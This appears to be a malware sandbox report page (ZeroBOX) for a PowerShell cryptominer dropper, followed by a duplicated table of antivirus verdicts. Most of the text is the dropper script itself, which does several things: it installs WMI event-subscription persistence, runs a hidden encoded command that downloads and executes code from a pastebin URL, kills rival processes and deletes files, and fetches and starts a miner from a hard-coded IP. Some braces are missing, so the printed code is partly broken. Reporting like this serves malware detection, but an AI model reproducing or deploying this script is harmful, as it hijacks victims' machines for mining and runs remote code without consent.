Static | ZeroBOX

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='ActiveMq'" | Remove-WmiObject -Verbose

Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='ActiveMq'" | Remove-WmiObject -Verbose

Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%subscription%'" | Remove-WmiObject -Verbose

Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'ActiveMq'} |Remove-WmiObject

$filterName = 'ActiveMq'

$consumerName = 'ActiveMq'

$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE

TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop

$Arg =@{

Name=$consumerName

CommandLineTemplate="shella -NonInteractive -windowstyle hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBGAFkAdQA0AEYAMQBZAFIAJwApAA=="

$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

cmd /c md C:\ProgramData\mssts

$ne = $MyInvocation.MyCommand.Path

$miner_url = "http://1.255.85.176:8080/Wuck/s.rar"

$miner_name = "javas"

$miner_cfg_url = "http://1.255.85.176:8080/Wuck/config.json"

$miner_cfg_name = "config.json"

$miner_path = "C:\ProgramData\mssts\javas.exe"

$miner_cfg_path = "C:\ProgramData\mssts\config.json"

cmd /c taskkill /f /im dsm.exe

cmd /c taskkill /f /im dom.exe

cmd /c taskkill /f /im solr.exe

cmd /c del /f /q C:\Windows\System32\config\systemprofile\dom\*

wmic process where "ExecutablePath like 'C:\\ProgramData\\Microsoft\\Windows\\Templates\\%'" delete

cmd /c del /f /q C:\ProgramData\Microsoft\Windows\Templates\*.exe

wmic process where "ExecutablePath like 'C:\\ProgramData\\Microsoft\\Windows\\WER\\%'" delete

cmd /c del /f /q C:\ProgramData\Microsoft\Windows\WER\*

cmd /c taskkill /f /im JavaAccessBridge.exe

cmd /c del /f /q C:\Users\Public\Videos\*

function Update($url,$path,$proc_name)

{

Get-Process -Name $proc_name | Stop-Process

Remove-Item $path

Try {

$vc = New-Object System.Net.WebClient

$vc.DownloadFile($url,$path)

Catch {

Write-Output "donwload with backurl"

cmd /c taskkill /f /im kthreaddk.exe

cmd /c taskkill /f /im sysupdate.exe

if(!(Get-Process $miner_name -ErrorAction SilentlyContinue))

Update $miner_url $miner_path $miner_name

Update $miner_cfg_url $miner_cfg_path $miner_cfg_name

Start-Process $miner_path -windowstyle hidden

Write-Output "Miner Running"

cmd /c taskkill /f /im powershell.exe

Antivirus	Signature
Bkav	Clean
Lionic	Clean
tehtris	Clean
Cynet	Malicious (score: 99)
CTX	powershell.miner.pwsh
CAT-QuickHeal	Clean
Skyhigh	Clean
ALYac	Generic.PWSH.Miner.C.639B8AB5
Malwarebytes	Clean
Zillya	Clean
Sangfor	Clean
CrowdStrike	Clean
K7GW	Clean
K7AntiVirus	Clean
Baidu	Clean
VirIT	Clean
Symantec	Scr.Malcode!gen
ESET-NOD32	PowerShell/CoinMiner.BW
TrendMicro-HouseCall	Clean
Avast	Clean
ClamAV	Clean
Kaspersky	HEUR:Trojan.PowerShell.Generic
BitDefender	Generic.PWSH.Miner.C.639B8AB5
NANO-Antivirus	Clean
ViRobot	Clean
MicroWorld-eScan	Generic.PWSH.Miner.C.639B8AB5
Tencent	Win32.Trojan.Generic.Ssmw
Sophos	Clean
F-Secure	Trojan.TR/PShell.Miner.G
DrWeb	Clean
VIPRE	Generic.PWSH.Miner.C.639B8AB5
TrendMicro	Clean
CMC	Clean
Emsisoft	Generic.PWSH.Miner.C.639B8AB5 (B)
huorong	TrojanDownloader/PS.NetLoader.gc
FireEye	Generic.PWSH.Miner.C.639B8AB5
Jiangmin	Clean
Varist	Clean
Avira	TR/PShell.Miner.G
Fortinet	Clean
Antiy-AVL	Clean
Kingsoft	Script.Ks.Malware.1747
Gridinsoft	Clean
Xcitium	Clean
Arcabit	Generic.PWSH.Miner.C.639B8AB5
SUPERAntiSpyware	Clean
ZoneAlarm	HEUR:Trojan.PowerShell.Generic
Microsoft	Clean
Google	Clean
AhnLab-V3	Clean
Acronis	Clean
McAfee	Clean
TACHYON	Clean
VBA32	Clean
Zoner	Clean
Rising	Clean
Yandex	Clean
Ikarus	Clean
MaxSecure	Clean
GData	Generic.PWSH.Miner.C.639B8AB5
AVG	Clean
Panda	Clean
alibabacloud	Clean

Antivirus

Signature

Bkav

Clean

Lionic

Clean

tehtris

Clean

Cynet

Malicious (score: 99)

CTX

powershell.miner.pwsh

CAT-QuickHeal

Clean

Skyhigh

Clean

ALYac

Generic.PWSH.Miner.C.639B8AB5

Malwarebytes

Clean

Zillya

Clean

Sangfor

Clean

CrowdStrike

Clean

K7GW

Clean

K7AntiVirus

Clean

Baidu

Clean

VirIT

Clean

Symantec

Scr.Malcode!gen

ESET-NOD32

PowerShell/CoinMiner.BW

TrendMicro-HouseCall

Clean

Avast

Clean

ClamAV

Clean

Kaspersky

HEUR:Trojan.PowerShell.Generic

BitDefender

Generic.PWSH.Miner.C.639B8AB5

NANO-Antivirus

Clean

ViRobot

Clean

MicroWorld-eScan

Generic.PWSH.Miner.C.639B8AB5

Tencent

Win32.Trojan.Generic.Ssmw

Sophos

Clean

F-Secure

Trojan.TR/PShell.Miner.G

DrWeb

Clean

VIPRE

Generic.PWSH.Miner.C.639B8AB5

TrendMicro

Clean

CMC

Clean

Emsisoft

Generic.PWSH.Miner.C.639B8AB5 (B)

huorong

TrojanDownloader/PS.NetLoader.gc

FireEye

Generic.PWSH.Miner.C.639B8AB5

Jiangmin

Clean

Varist

Clean

Avira

TR/PShell.Miner.G

Fortinet

Clean

Antiy-AVL

Clean

Kingsoft

Script.Ks.Malware.1747

Gridinsoft

Clean

Xcitium

Clean

Arcabit

Generic.PWSH.Miner.C.639B8AB5

SUPERAntiSpyware

Clean

ZoneAlarm

HEUR:Trojan.PowerShell.Generic

Microsoft

Clean

Google

Clean

AhnLab-V3

Clean

Acronis

Clean

McAfee

Clean

TACHYON

Clean

VBA32

Clean

Zoner

Clean

Rising

Clean

Yandex

Clean

Ikarus

Clean

MaxSecure

Clean

GData

Generic.PWSH.Miner.C.639B8AB5

AVG

Clean

Panda

Clean

alibabacloud

Clean